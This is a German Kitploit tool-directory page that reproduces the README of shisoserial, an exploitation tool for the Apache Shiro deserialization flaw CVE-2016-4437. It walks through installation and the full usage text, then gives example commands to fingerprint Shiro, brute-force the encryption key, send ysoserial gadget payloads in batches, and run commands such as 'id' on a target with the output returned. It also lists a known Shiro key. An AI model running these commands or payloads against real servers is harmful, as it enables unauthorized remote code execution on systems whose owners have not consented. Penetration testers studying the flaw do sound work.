Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
shisoserial — Ein schnelles Ausnutzungstool für die Shiro-Deserialisierungssicherheitslücke (CVE-2016-4437)/Ein einfaches Werkzeug für Angriffe auf das Shiro-Framework mit ysoserial. | Kitploit
Tools/GitHubGitHub/4nth0ny1130/shisoserial
Payload-GenerierungSchwachstellenanalyseExploitationWebanwendungs-ExploitationPenetrationstestsCommand and Control
GitHub4nth0ny1130/shisoserial

shisoserial

Ein schnelles Ausnutzungstool für die Shiro-Deserialisierungssicherheitslücke (CVE-2016-4437)/Ein einfaches Werkzeug für Angriffe auf das Shiro-Framework mit ysoserial.

Repository anzeigen
242vor 4 JahrenVon Kitploit geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

shisoserial

Englische Dokumentation

Was ist das?

Ein schnelles Ausnutzungstool für die Shiro-Deserialisierungssicherheitslücke (CVE-2016-4437)

Mitwirkende

4nth0ny @星期五实验室

Issues/PRs sind willkommen

:)

Umgebung

  • python 3.x

  • JDK 1.8

Installation

root@kitploit:~
python3 -m pip install -r requirements.txt

Falls AttributeError: module 'Crypto.Cipher.AES' has no attribute 'MODE_GCM' oder No module named 'Crypto'

root@kitploit:~
python3 -m pip uninstall crypto pycryptodome
python3 -m pip install pycryptodome

Verwendung

root@kitploit:~
usage: shisoserial.py [-h] --mode MODE --url  [--type default:CBC] [--data] [--key] [--gadget] [--command default:whoami] [--proxies] [--ser] [--thread]

This is a simple tool to attack framework shiro with ysoserial

optional arguments:
  -h, --help            show this help message and exit
  --mode MODE, -m MODE  check/crack/yso/echo/encode
  --url , -u            Target URL address or the file containing the target URL
  --type default:CBC, -t default:CBC
                        Cipher Type, GCM or CBC
  --data , -d           Using this parameter will make HTTP request with POST method
  --key , -k            Specify a Shiro Key or will use dictionary brute force cracking
  --gadget , -g         Specific Ysoserial Gadget
  --command default:whoami, -c default:whoami
                        Specific Execute Command
  --proxies , -p        Specific Proxy
  --ser , -s            Specific serialize file name
  --thread , -T         Specific the number of threads

Beispiele

Überprüfen, ob das Ziel das Shiro-Framework verwendet (mit Standard-CBC-Verschlüsselung)

root@kitploit:~
python3 shisoserial.py -m check -u http://127.0.0.1:8080

Brute-Force des Ziel-Shiro-Keys mit Proxy und CBC-Verschlüsselung

root@kitploit:~
python3 shisoserial.py -m crack -u http://*.*.*.*:**** -t CBC -p ****://*.*.*.*:****/

Befehl mit der CommonsCollectionsK1-Ausnutzungskette ausführen und Ergebnis abrufen

root@kitploit:~
python3 shisoserial.py -m echo -u http://127.0.0.1:8080 -g CommonsCollectionsK1 -c id

Batch-Überprüfung eines angegebenen Shiro-Keys mit POST-Anfragen

root@kitploit:~
python3 shisoserial.py -m crack -u target_urls.txt -k kPH+bIxk5D2deZiIxcaaaA== -d username=1

image-20211229223405240

Payload aus serialisierter Datendatei erstellen und mit mehreren Threads senden

root@kitploit:~
python3 shisoserial.py -m encode -u target_urls.txt -t cbc -s 1.ser -T 4

image-20211230181021173

Haftungsausschluss

Dieses Tool darf nur im Rahmen der Unternehmenssicherheit mit ausreichender rechtlicher Genehmigung eingesetzt werden. Bei der Nutzung dieses Tools müssen Sie sicherstellen, dass all Ihre Handlungen den lokalen Gesetzen und Vorschriften entsprechen. Falls Sie bei der Nutzung dieses Tools illegale Handlungen begehen, tragen Sie selbst alle Konsequenzen; alle Entwickler und Mitwirkenden dieses Tools übernehmen keinerlei rechtliche oder damit verbundene Haftung. Sofern Sie diese Bedingungen nicht vollständig gelesen, verstanden und akzeptiert haben, installieren und verwenden Sie dieses Tool bitte nicht. Ihre Nutzung des Tools oder jede andere ausdrückliche oder stillschweigende Zustimmung zu diesen Bedingungen gilt als Ihr Einverständnis, diese Bedingungen gelesen und akzeptiert zu haben.

Tool herunterladen